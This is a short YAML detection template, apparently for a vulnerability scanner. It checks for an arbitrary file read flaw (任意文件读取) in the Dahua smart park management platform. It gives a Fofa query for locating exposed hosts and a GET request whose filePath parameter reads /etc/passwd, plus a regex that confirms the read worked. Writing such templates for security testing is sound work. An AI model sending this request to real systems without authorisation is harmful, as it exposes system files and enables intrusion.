漏洞描述
Fofa: body="/WPMS" || body="src=\"/WPMS/asset/common/js/jsencrypt.min.js\""
id: dahua-smart-downloadbyurlatt-fileread
info:
name: 大华智慧园区管理平台任意文件读取
author: zan8in
severity: critical
description: |-
Fofa: body="/WPMS" || body="src=\"/WPMS/asset/common/js/jsencrypt.min.js\""
reference:
- https://mp.weixin.qq.com/s/uRhVl2XC5fTNKO8eDFFebA
tags: dahua,fileread
created: 2023/11/29
rules:
r0:
request:
method: GET
path: /portal/itc/attachment_downloadByUrlAtt.action?filePath=file:/etc/passwd
expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()